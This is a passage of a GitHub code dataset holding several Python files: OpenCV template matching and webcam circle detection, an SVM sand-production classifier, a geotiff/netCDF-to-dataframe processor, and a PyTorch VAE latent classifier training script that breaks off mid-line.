image[c1:c1+25,r1:r1+25]\n# template = cv2.cloneImage(image)\n# cv2.showImage(win_name, template)\n\n# template = img[896:1460, 732:1321]\ntemplate = img[600:635, 755:778]\nw, h = template.shape[1] - 1, template.shape[0] -1\ncv2.imshow(\"tepl\", template)\ncv2.waitKey()\n#exit(0)\n\"\"\"\ncv2.imshow(win_name, template)\nprint(dir(image.size))\ncv2.waitKey()\n#cv2.resetImageROI(image)\n#W, H = cv2.getSize(image)\n#w, h = cv2.getSize(template)\n#width = W - w + 1\n#height = H - h + 1\n# result = cv2.createImage((width, height), 32, 1)\n\nwidth, height = image.shape[1] -template.shape[1] +1, image.shape[0] - template.shape[0] + 1\n# http://stackoverflow.com/questions/12881926/create-a-new-rgb-opencv-image-using-python\nresult = np.zeros((width, height, 3), np.uint8)\n# 
result is a matrix that stores the similarity of the template against every position of the source image\ncv2.matchTemplate(image, template, result, cv2.TM_SQDIFF)\n\n# The following finds the point with the smallest difference value in that matrix, which locates the template\n(min_x, max_y, minloc, maxloc) = cv2.minMaxLoc(result)\n(x, y) = minloc\ncv2.rectangle(image, (int(x), int(y)), (int(x) + w, int(y) + h), (255, 255, 255), 1, 0)\ncv2.showImage(win2_name, image)\n\ncv2.waitKey()\n\"\"\"\n# All the 6 methods for comparison in a list\nmethods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\n           'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n\nfor meth in methods:\n    img = img2.copy()\n    method = eval(meth)\n\n    # Apply template Matching\n    res = cv2.matchTemplate(img, template, method)\n    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n    # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n    if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n        top_left = min_loc\n    else:\n        top_left = max_loc\n    bottom_right = (top_left[0] + w, top_left[1] + h)\n\n    cv2.rectangle(img, top_left, bottom_right, 255, 2)\n    plt_img = img[..., ::-1]\n    plt_res = res  # the match map is single-channel; no BGR-to-RGB reversal needed\n    plt.subplot(121), plt.imshow(plt_res, cmap='gray')\n    plt.title('Matching Result'), plt.xticks([]), plt.yticks([])\n    plt.subplot(122), plt.imshow(plt_img, cmap='gray')\n    plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n    plt.suptitle(meth)\n\n    plt.show()\n","repo_name":"peaceshi/OpenCV","sub_path":"match_template.py","file_name":"match_template.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40263585935","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 3 20:25:17 2021\r\n\r\n@author: NGWASHIRONALD\r\n\"\"\"\r\n\r\n#This is a binary classification algorithm that predicts whether \r\n#1 the formation will produce sand or 0 the formation will not produce sand \r\n#PART 1: Data Preprocessing \r\n\r\n#Step 1: Importing the libraries \r\nimport numpy as np\r\nimport matplotlib.pyplot as mtp \r\nimport pandas as pd \r\nfrom scipy import stats\r\nimport seaborn as sns; sns.set()\r\n\r\n#importing the dataset \r\ndataset = pd.read_csv(\"ANNDatasetMod.csv\")\r\n#Selecting the independent variables which will influence sanding \r\n#These variables include reservoir depth, overburden, pore pressure,\r\n#Min and Max Horizontal stress, Poisson's ratio, Young's Modulus,\r\n#Friction angle, and shale content. 
\r\nx = dataset.iloc[:,1:13].values\r\ny = dataset.iloc[:,13].values\r\n#There are no variables to encode so we move to splitting the dataset \r\n#from sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n#onehotencoder = OneHotEncoder(categorical_features = [1])\r\n#x = onehotencoder.fit_transform(x).toarray()\r\n#Splitting the dataset into the training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 0.30, random_state =109)\r\n#feature Scaling to ease calculations and prevent one independent variable from dominating another\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nx_train =sc.fit_transform(x_train)\r\nx_test = sc.transform(x_test)\r\n\r\n#Import svm model\r\nfrom sklearn import svm\r\n\r\n#Create a svm Classifier\r\nclf = svm.SVC(kernel='linear') # Linear Kernel\r\n\r\n#Train the model using the training sets\r\nclf.fit(x_train, y_train)\r\n\r\n#Predict the response for test dataset\r\ny_pred = clf.predict(x_test)\r\n\r\n#Import scikit-learn metrics module for accuracy calculation\r\nfrom sklearn import metrics\r\n#Creating the Confusion matrix \r\nfrom sklearn.metrics import confusion_matrix \r\ncm= confusion_matrix(y_test, y_pred) \r\nprint(cm)\r\n# Model Accuracy: how often is the classifier correct?\r\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\r\n\r\n# Model Precision: what percentage of positive tuples are labeled as such?\r\nprint(\"Precision:\",metrics.precision_score(y_test, y_pred))\r\n\r\n# Model Recall: what percentage of positive tuples are labelled as such?\r\nprint(\"Recall:\",metrics.recall_score(y_test, y_pred))\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(y_test,y_pred))\r\n\r\n\r\n\r\n\r\nfrom matplotlib.colors import ListedColormap \r\nx_set, y_set = x_train, y_train \r\nx1, x2 = np.meshgrid(np.arange(start = x_set[:, 0].min() - 1, stop = x_set[:, 0].max() + 1, step =0.01), \r\nnp.arange(start = x_set[:, 1].min() - 1, stop = x_set[:, 1].max() + 1, step = 0.01)) \r\nxpred = np.array([x1.ravel(), x2.ravel()] + [np.repeat(0, x1.ravel().size) for _ in range(10)]).T\r\npred = clf.predict(xpred).reshape(x1.shape)\r\nmtp.contour(x1,x2,pred,alpha = 0.75, cmap = ListedColormap(('red','green')))\r\n\r\nmtp.xlim(x1.min(), x1.max()) \r\nmtp.ylim(x2.min(), x2.max()) \r\nfor i, j in enumerate(np.unique(y_set)): \r\n    mtp.scatter(x_set[y_set == j, 0], x_set[y_set == j, 1], \r\n                c = ListedColormap(('red', 'green'))(i), label = j) \r\nmtp.title('SVM classifier (Training set)') \r\nmtp.xlabel('Feature 1 (scaled)') \r\nmtp.ylabel('Feature 2 (scaled)') \r\nmtp.legend() \r\nmtp.show() \r\n\r\nx_set, y_set = x_test, y_test \r\nx1, x2 = np.meshgrid(np.arange(start = x_set[:, 0].min() - 1, stop = x_set[:, 0].max() + 1, step =0.01), \r\nnp.arange(start = x_set[:, 1].min() - 1, stop = x_set[:, 1].max() + 1, step = 0.01)) \r\nxpred = np.array([x1.ravel(), x2.ravel()] + [np.repeat(0, x1.ravel().size) for _ in range(10)]).T\r\npred = clf.predict(xpred).reshape(x1.shape)\r\nmtp.contour(x1,x2,pred,alpha = 0.75, cmap = ListedColormap(('red','green')))\r\n\r\nmtp.xlim(x1.min(), x1.max()) \r\nmtp.ylim(x2.min(), x2.max()) \r\nfor i, j in enumerate(np.unique(y_set)): \r\n    mtp.scatter(x_set[y_set == j, 0], x_set[y_set == j, 1], \r\n                c = ListedColormap(('red', 'green'))(i), label = j) \r\nmtp.title('SVM classifier (Test set)') \r\nmtp.xlabel('Feature 1 (scaled)') \r\nmtp.ylabel('Feature 2 (scaled)') \r\nmtp.legend() \r\nmtp.show() 
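\r\n\r\n#Optional sanity check (illustrative sketch, reusing the scaled x_train/y_train above):\r\n#5-fold cross-validation estimates accuracy without relying on a single train/test split.\r\nfrom sklearn.model_selection import cross_val_score\r\ncv_scores = cross_val_score(svm.SVC(kernel='linear'), x_train, y_train, cv=5)\r\nprint(\"Cross-validated accuracy: %.3f +/- %.3f\" % (cv_scores.mean(), cv_scores.std()))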
\r\n","repo_name":"nafungchwi/ClassficationProblemOilandGas","sub_path":"SVM_Sand_Production.py","file_name":"SVM_Sand_Production.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10694328528","text":"import cv2\nimport numpy as np\n\n\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\n\n\n\n\nwhile True:\n    ret, frame = cap.read()\n    gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n\n    circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.2, 100)\n    if circles is not None:\n        circles = np.round(circles[0,:]).astype(\"int\")\n        for (x,y,r) in circles:\n            cv2.circle(frame,(x,y),r,(0,255,0),4)\n            cv2.rectangle(frame,(x-5,y-5),(x+5,y+5),(0,128,255),-1)\n\n    cannyImg = cv2.Canny(gray,100,100)\n    cv2.putText(frame,\"Lul git gud\",(320,240),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),1)\n    success, img = cap.read()\n    cv2.imshow(\"Webcam\",cannyImg)\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n","repo_name":"mvog2501/VisionProcessing","sub_path":"OpenCV/readImage.py","file_name":"readImage.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"71806404749","text":"\"\"\"File processor functions that return dataframes when fed a file in order to enable downstream processing.\n\nRaises:\n    TypeError: If a file fails to process and no dataframe is produced.\n    AssertionError: If a netCDF file cannot be converted to a dataframe.\n\nReturns:\n    pandas.DataFrame: A dataframe of the input data to be used downstream\n\"\"\"\n\nimport logging\n\nimport numpy\nfrom osgeo import gdal, gdalconst\nimport pandas\nimport xarray\n\n\ndef process_file_by_filetype(filepath, file_type, transformation_metadata):\n    dataframe = None\n    if file_type == \"geotiff\":\n        dataframe = raster2df_processor(\n            InRaster=filepath,\n            feature_name=transformation_metadata[\"feature_name\"],\n            band=int(\n                transformation_metadata[\"band\"]\n                if \"band\" in transformation_metadata\n                and transformation_metadata[\"band\"] != \"\"\n                else \"0\"\n            ),\n            nodataval=int(transformation_metadata[\"null_val\"]),\n            date=transformation_metadata[\"date\"]\n            if (\n                \"date\" in transformation_metadata\n                and transformation_metadata[\"date\"] != \"\"\n            )\n            else None,\n            band_name=transformation_metadata[\"band_name\"],\n            bands=transformation_metadata[\"bands\"]\n            if \"bands\" in transformation_metadata\n            else None,\n            band_type=transformation_metadata[\"band_type\"]\n            if \"band_type\" in transformation_metadata\n            else \"category\",\n        )\n    elif file_type == \"excel\":\n        dataframe = pandas.read_excel(filepath, transformation_metadata[\"sheet\"])\n    elif file_type != \"csv\":\n        dataframe = netcdf2df_processor(filepath)\n    else:\n        dataframe = pandas.read_csv(filepath)\n\n    if dataframe is None:\n        raise TypeError(\n            \"File failed to process, dataframe returned as None type object\"\n        )\n    return dataframe\n\n\ndef raster2df_processor(\n    InRaster: str,\n    feature_name: str = \"feature\",\n    band: int = 0,\n    nodataval: int = -9999,\n    date: str = None,\n    band_name: str = \"feature2\",\n    bands: dict = None,\n    band_type: str = \"category\",\n) -> pandas.DataFrame:\n    \"\"\"\n    Description\n    -----------\n    Takes the path of a raster (.tiff) file and produces a pandas DataFrame.\n\n    Parameters\n    ----------\n    InRaster: str\n        the path of the input raster file\n    feature_name: str\n        the name of the feature represented by the pixel values\n    band: int, default 0\n        the band to operate on (0 processes all bands)\n    nodataval: int, default -9999\n        the value for no data pixels\n    date: str, 
default None\n        date associated with the raster (if any)\n    band_name: str, default feature2\n        the name of the band data e.g. head_count, flooding\n    bands: dict, default None\n        passed in meta; dictionary of band identifiers and specifies bands to\n        be processed.\n    band_type: str, default category\n        Specifies band type e.g. category or datetime. If datetime, this data goes into the date column.\n\n    Examples\n    --------\n    Converting a geotiff of rainfall data into a pandas dataframe\n\n    >>> df = raster2df_processor('path_to_raster.geotiff', 'rainfall', band=1)\n\n    \"\"\"\n    # open the raster and get some properties\n    data_source = gdal.OpenShared(InRaster, gdalconst.GA_ReadOnly)\n    GeoTrans = data_source.GetGeoTransform()\n    ColRange = range(data_source.RasterXSize)\n    RowRange = range(data_source.RasterYSize)\n\n    # Creating variables for the dataframe and value data type.\n    dataframe = pandas.DataFrame()\n\n    for x in range(1, data_source.RasterCount + 1):\n        # If band has a value, then limit import to the single specified band.\n        if band > 0 and band != x:\n            continue\n\n        # If no bands in meta, then single-band and use band_name\n        # If bands, then process only those in the meta.\n        if not bands:\n            band_value = band_name\n            logging.info(\n                f\"Single band detected. Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n            )\n        elif str(x) in bands:\n            band_value = bands[str(x)]\n            logging.info(\n                f\"Multi-band detected. Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n            )\n        elif str(x) not in bands:\n            # Processing a band not specified in the meta, so skip it\n            logging.info(f\"Skipping band {x} since it is not specified in {bands}.\")\n            continue\n        else:\n            raise Exception(\n                f\"Neither single nor multiple bands specified in meta. Current band: {x}, Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n            )\n\n        # Create columns for the dataframe.\n        if not bands:\n            columns = [\"longitude\", \"latitude\", feature_name]\n            logging.info(f\"Single band detected. Columns are: {columns}\")\n        elif band_type == \"datetime\":\n            columns = [\"longitude\", \"latitude\", \"date\", feature_name]\n            logging.info(f\"Datetime multiband detected. Columns are: {columns}\")\n        elif band_type == \"category\":\n            # categorical multi-band; add columns during processing.\n            columns = [\"longitude\", \"latitude\", band_value]\n            logging.info(f\"Categorical multiband detected. Columns are: {columns}\")\n        else:\n            raise Exception(\n                f\"During column processing, neither single nor multiple bands specified in meta. Bands: {bands}, band_name: {band_name}, feature_name: {feature_name}\"\n            )\n\n        rBand = data_source.GetRasterBand(x)\n        nData = rBand.GetNoDataValue()\n\n        if nData is None:\n            logging.warning(f\"No nodataval found, setting to {nodataval}\")\n            nData = numpy.float32(nodataval)  # set it to something if not set\n        else:\n            logging.info(f\"Nodataval is: {nData} type is : {type(nData)}\")\n\n        # specify the center offset (takes the point in middle of pixel)\n        HalfX = GeoTrans[1] / 2\n        HalfY = GeoTrans[5] / 2\n\n        # Check that NoDataValue is of the same type as the raster data\n        RowData = rBand.ReadAsArray(0, 0, data_source.RasterXSize, 1)[0]\n        row_data_type = type(RowData[0])\n        if type(nData) != row_data_type:\n            logging.info(\n                f\"NoData type mismatch: NoDataValue is type {type(nData)} and raster data is type {row_data_type}\"\n            )\n            # e.g. 
NoDataValue is type <class 'float'> and raster data is type <class 'numpy.float32'>\n            # Fix float type mismatches so comparison works below (row_value != nData)\n            if row_data_type == numpy.float32:\n                nData = numpy.float32(nData)\n            elif row_data_type == numpy.float64:\n                nData = numpy.float64(nData)\n            elif row_data_type == numpy.float16:\n                nData = numpy.float16(nData)\n\n        points = []\n\n        for ThisRow in RowRange:\n            RowData = rBand.ReadAsArray(0, ThisRow, data_source.RasterXSize, 1)[0]\n            for ThisCol in ColRange:\n                # need to exclude NaN values since there is no nodataval\n                row_value = RowData[ThisCol]\n\n                # if the null data value is a straight up nan then we should only check if the row_value is nan\n                # however, if the null data value is not nan (e.g. a number) we should make sure that row_value\n                # does not equal that number\n                if (numpy.isnan(nData) and not numpy.isnan(row_value)) or (not numpy.isnan(nData) and row_value != nData):\n\n                    # TODO: implement filters on valid pixels\n                    # for example, the below would ensure pixel values are between -100 and 100\n                    # if (RowData[ThisCol] <= 100) and (RowData[ThisCol] >= -100):\n\n                    X = GeoTrans[0] + (ThisCol * GeoTrans[1])\n                    Y = GeoTrans[3] + (\n                        ThisRow * GeoTrans[5]\n                    )  # Y is negative so it's a minus\n                    # this gives the upper left of the cell, offset by half a cell to get centre\n                    X += HalfX\n                    Y += HalfY\n\n                    # Add the data row to the dataframe.\n                    if bands is None:\n                        points.append([X, Y, row_value])\n                    elif band_type == \"datetime\":\n                        points.append([X, Y, band_value, row_value])\n                    else:\n                        points.append([X, Y, row_value])\n\n        # This will make all floats float64, but will be optimized in process().\n        new_dataframe = pandas.DataFrame(points, columns=columns)\n\n        if dataframe.empty:\n            dataframe = new_dataframe\n        else:\n            # df = df.merge(new_df, left_on=[\"longitude\", \"latitude\"], right_on=[\"longitude\", \"latitude\"])\n            if bands and band_type != \"datetime\":\n                # df.join(new_df, on=[\"longitude\", \"latitude\"])\n                dataframe = dataframe.merge(\n                    new_dataframe,\n                    left_on=[\"longitude\", \"latitude\"],\n                    right_on=[\"longitude\", \"latitude\"],\n                )\n            else:\n                dataframe = dataframe.append(new_dataframe)\n\n    # Add the date from the mapper.\n    if date and band_type != \"datetime\":\n        dataframe[\"date\"] = date\n\n    dataframe.sort_values(by=columns, inplace=True)\n\n    return dataframe\n\n\ndef netcdf2df_processor(netcdf: str) -> pandas.DataFrame:\n    \"\"\"\n    Produce a dataframe from a NetCDF4 file.\n\n    Parameters\n    ----------\n    netcdf: str\n        Path to the netcdf file\n\n    Returns\n    -------\n    DataFrame\n        The resultant dataframe\n    \"\"\"\n    try:\n        data_source = xarray.open_dataset(netcdf)\n    except:\n        raise AssertionError(\n            f\"Improperly formatted netCDF file ({netcdf}), xarray could not convert it to a dataframe.\"\n        )\n\n    dataframe = data_source.to_dataframe()\n    final_dataframe = dataframe.reset_index()\n\n    return final_dataframe\n","repo_name":"jataware/elwood","sub_path":"elwood/file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":10050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"14961959645","text":"import argparse\nimport math\nimport time\n\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.utils.data import TensorDataset, Dataset\n\nfrom datasets import *\nfrom models.network3 import Network3\nfrom result_logger import ResultLogger\nfrom utils import 
*\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('data', metavar='DIR',\n help='path to datasets')\nparser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',\n help='model architecture')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start-epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('-b', '--batch-size', default=256, type=int,\n metavar='N',\n help='mini-batch size (default: 256), this is the total '\n 'batch size of all GPUs on the current node when '\n 'using Data Parallel or Distributed Data Parallel')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate', dest='lr')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)',\n dest='weight_decay')\nparser.add_argument('--step-size', default=30, type=int)\nparser.add_argument('-p', '--print-freq', default=100, type=int,\n metavar='N', help='print frequency (default: 100)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',\n help='evaluate model on validation set')\nparser.add_argument('--pretrained', dest='pretrained', action='store_true',\n help='use pre-trained model')\nparser.add_argument('--world-size', default=-1, type=int,\n help='number of nodes for distributed training')\nparser.add_argument('--rank', default=-1, type=int,\n help='node rank for distributed training')\nparser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,\n help='url used to set up distributed training')\nparser.add_argument('--dist-backend', default='nccl', type=str,\n help='distributed backend')\nparser.add_argument('--seed', default=0, type=int,\n help='seed for initializing training. ')\nparser.add_argument('--gpu', default=None, type=int,\n help='GPU id to use.')\nparser.add_argument('--multiprocessing-distributed', action='store_true',\n help='Use multi-processing distributed training to launch '\n 'N processes per node, which has N GPUs. 
This is the '\n 'fastest way to use PyTorch for either single node or '\n 'multi node data parallel training')\nparser.add_argument('--new-size', type=int, default=256)\nparser.add_argument('--crop-size', type=int, default=224)\nparser.add_argument('--datadir', type=str, default='.')\nparser.add_argument('--logdir', type=str, default='.')\nparser.add_argument('--viz-step', type=int, default=1)\nparser.add_argument('--warmup-threshold', type=float, default=None)\nparser.add_argument('--warmup-epochs', type=int, default=0)\nparser.add_argument('--lr-step', type=int, default=None)\nparser.add_argument('--ngpus', default=1, type=int,\n help='number of GPUs to use.')\nparser.add_argument('--clip-grad', type=float, default=None)\nparser.add_argument('--milestones', nargs='+', type=int, default=None)\nparser.add_argument('--gamma', type=float, default=0.1)\nparser.add_argument('--loss', type=str, default=None)\nparser.add_argument('--z-dim', type=int)\nparser.add_argument('--h-dim', type=int)\nparser.add_argument('--generative', action='store_true')\n\nargs = parser.parse_args()\nfree_gpus = get_free_gpu(num=args.ngpus)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = free_gpus\n# os.environ[\"OMP_NUM_THREADS\"] = str(args.ngpus * 4)\n\nbest_acc1 = 0\n\n\nclass RepeatedDataset(Dataset):\n def __init__(self, mus, logvars, targets, rep_nums, class_cnts):\n super(RepeatedDataset, self).__init__()\n mus_list, logvars_list, targets_list = [], [], []\n n_classes = len(rep_nums)\n max_cnt = max(class_cnts)\n\n for i in range(n_classes):\n idx = (targets == i)\n mus_base = list(mus[idx])\n logvars_base = list(logvars[idx])\n targets_base = list(targets[idx])\n if rep_nums[i] <= 0.0:\n mus_list.extend(mus_base)\n logvars_list.extend(logvars_base)\n targets_list.extend(targets_base)\n else:\n mus_list.extend((mus_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n logvars_list.extend((logvars_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n targets_list.extend((targets_base * (math.ceil(rep_nums[i])))[:(max_cnt - class_cnts[i])])\n self.mus_list = mus_list\n self.logvars_list = logvars_list\n self.targets_list = targets_list\n\n def __getitem__(self, index):\n return self.mus_list[index], self.logvars_list[index], self.targets_list[index]\n\n def __len__(self):\n return len(self.mus_list)\n\n\ndef reparameterize(mu, logvar):\n std = (logvar.clamp(-50, 50).exp() + 1e-8) ** 0.5\n eps = torch.randn_like(logvar)\n return eps * std + mu\n\n\ndef get_data(loader, model, args):\n # switch to evaluate mode\n model.eval()\n\n mus = []\n logvars = []\n targets = []\n with torch.no_grad():\n for i, (images, target) in enumerate(tqdm(loader)):\n targets.append(target)\n if args.gpu is not None:\n images = images.cuda(args.gpu, non_blocking=True)\n\n # compute output\n mu, logvar, _ = model.get_z(images)\n mus.append(mu.detach().cpu())\n logvars.append(logvar.detach().cpu())\n\n mus = torch.cat(mus, dim=0)\n logvars = torch.cat(logvars, dim=0)\n targets = torch.cat(targets, dim=0)\n return mus, logvars, targets\n\n\ndef get_rep_nums(dataset):\n class_cnts = dataset.get_class_count()\n max_cnt = max(class_cnts)\n rep_nums = [(max_cnt - class_cnts[i]) / class_cnts[i] for i in range(len(class_cnts))]\n print(rep_nums, class_cnts)\n return rep_nums, class_cnts\n\n\ndef augment_data(mus, logvars, target, rep_nums, class_cnts):\n mus_list, logvars_list, target_list = [], [], []\n n_classes = len(rep_nums)\n max_cnt = max(class_cnts)\n\n for i in range(n_classes):\n idx = (target == i)\n mus_base = 
mus[idx]\n logvars_base = logvars[idx]\n target_base = target[idx]\n if rep_nums[i] <= 0.0:\n mus_list.append(mus_base)\n logvars_list.append(logvars_base)\n target_list.append(target_base)\n else:\n mus_list.append(mus_base.repeat(math.ceil(rep_nums[i]), 1)[:(max_cnt - class_cnts[i])])\n logvars_list.append(logvars_base.repeat(math.ceil(rep_nums[i]), 1)[:(max_cnt - class_cnts[i])])\n target_list.append(target_base.repeat(math.ceil(rep_nums[i]))[:(max_cnt - class_cnts[i])])\n mus_list = torch.cat(mus_list, 0)\n logvars_list = torch.cat(logvars_list, 0)\n target_list = torch.cat(target_list, 0)\n return mus_list, logvars_list, target_list\n\n\ndef train_classifier(train_loader, model, criterion, optimizer, args, epoch, result_logger):\n losses = AverageMeter('Loss', ':.4e')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(\n len(train_loader),\n [losses, top1, top5],\n prefix=\"Epoch: [{}]\".format(epoch))\n\n # switch to train mode\n model.train()\n\n for i, (mu, logvar, target) in enumerate(train_loader):\n if args.gpu is not None:\n mu = mu.cuda(args.gpu, non_blocking=True)\n logvar = logvar.cuda(args.gpu, non_blocking=True)\n if torch.cuda.is_available():\n target = target.cuda(args.gpu, non_blocking=True)\n\n # compute loss\n z = reparameterize(mu, logvar)\n logits = model(z)\n loss = criterion(logits, target)\n\n # measure accuracy and record loss\n acc1, acc5 = accuracy(logits, target, topk=(1, 5))\n losses.update(loss.item(), target.size(0))\n top1.update(acc1[0].item(), target.size(0))\n top5.update(acc5[0].item(), target.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n if args.clip_grad:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad)\n optimizer.step()\n\n if i % args.print_freq == 0:\n progress.display(i)\n if torch.isnan(loss).any():\n raise RuntimeError(\"nan in loss!\")\n\n\ndef validate(val_loader, model, criterion, args, epoch, result_logger=None):\n batch_time = AverageMeter('Time', ':6.3f')\n top1 = AverageMeter('Acc@1', ':6.2f')\n top5 = AverageMeter('Acc@5', ':6.2f')\n progress = ProgressMeter(\n len(val_loader),\n [batch_time, top1, top5],\n prefix='Test: ')\n # switch to evaluate mode\n model.eval()\n\n probs = []\n targets = []\n with torch.no_grad():\n end = time.time()\n for i, (mu, logvar, target) in enumerate(val_loader):\n if args.gpu is not None:\n mu = mu.cuda(args.gpu, non_blocking=True)\n logvar = logvar.cuda(args.gpu, non_blocking=True)\n targets.append(target)\n if torch.cuda.is_available():\n target = target.cuda(args.gpu, non_blocking=True)\n\n z = reparameterize(mu, logvar)\n logits = model(z)\n prob = torch.softmax(logits, dim=1)\n\n probs.append(prob.detach().cpu())\n # measure accuracy and record loss\n acc1, acc5 = accuracy(logits, target, topk=(1, 5))\n\n top1.update(acc1[0].item(), target.size(0))\n top5.update(acc5[0].item(), target.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n progress.display(i)\n probs = torch.cat(probs, dim=0)\n predicts = torch.argmax(probs, dim=1)\n targets = torch.cat(targets, dim=0)\n # TODO: this should also be done with the ProgressMeter\n print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5))\n\n if result_logger is not None:\n result_logger.add_test_metrics(targets.numpy(), predicts.numpy(), probs.numpy(), time=batch_time.sum)\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, 
best_filename='checkpoint.pth', logdir=None):\n path = os.path.join(logdir if logdir is not None else os.getcwd(), best_filename)\n torch.save(state, path)\n if is_best:\n best_filename = 'fc_best_ep{:03d}_acc{:.2f}.pth'.format(state['epoch'], state['best_acc1'])\n shutil.copyfile(path, os.path.join(logdir, best_filename))\n\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\nnew_size, crop_size = args.new_size, args.crop_size\nbatch_size = args.batch_size\ntransform = transforms.Compose([\n transforms.Resize((new_size, new_size)),\n transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n normalize,\n])\ntrain_dataset = get_dataset(args.data, root=args.datadir, train=True, transform=transform)\nval_dataset = get_dataset(args.data, root=args.datadir, train=False, transform=transform)\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n\nval_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\nnum_classes = args.num_classes = get_dataset_class_number(args.data)\n\nif args.arch == 'resnet_vae3':\n from models.ResNetVAE3 import ResNet_VAE_encoder\n from models.ResNetVAE3 import ResNet_VAE_decoder\n\n encoder = ResNet_VAE_encoder(h_dim=args.h_dim, pretrained=args.pretrained)\n decoder = ResNet_VAE_decoder(num_classes, h_dim=args.h_dim, z_dim=args.z_dim, img_size=args.crop_size)\n net = Network3\nelse:\n raise NotImplementedError\nmodel = net(encoder, decoder, num_classes, args.h_dim, args.z_dim, generative=args.generative, mlp_dim=None)\n\nif os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location='cpu')\n state_dict = {k[7:]: v for k, v in checkpoint['state_dict'].items()} # remove \"module.\" prefix in keys\n\n model.load_state_dict(state_dict)\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n\n# load weight\ntorch.cuda.set_device(args.gpu)\nmodel = model.cuda(args.gpu)\ntrain_mus, train_logvars, train_target = get_data(train_loader, model, args)\ntest_mus, test_logvars, test_target = get_data(val_loader, model, args)\n\nmodel = model.classifier\nrep_nums, class_cnts = get_rep_nums(train_dataset)\n# train_mus, train_logvars, train_target = augment_data(train_mus, train_logvars, train_target, rep_nums, class_cnts)\n\ntrain_loader = torch.utils.data.DataLoader(\n RepeatedDataset(train_mus, train_logvars, train_target, rep_nums, class_cnts),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)\nval_loader = torch.utils.data.DataLoader(\n TensorDataset(test_mus, test_logvars, test_target), batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n\ntrain_class_count = train_dataset.get_class_count()\ntest_class_count = val_dataset.get_class_count()\nresult_logger = ResultLogger('metrics_aug', 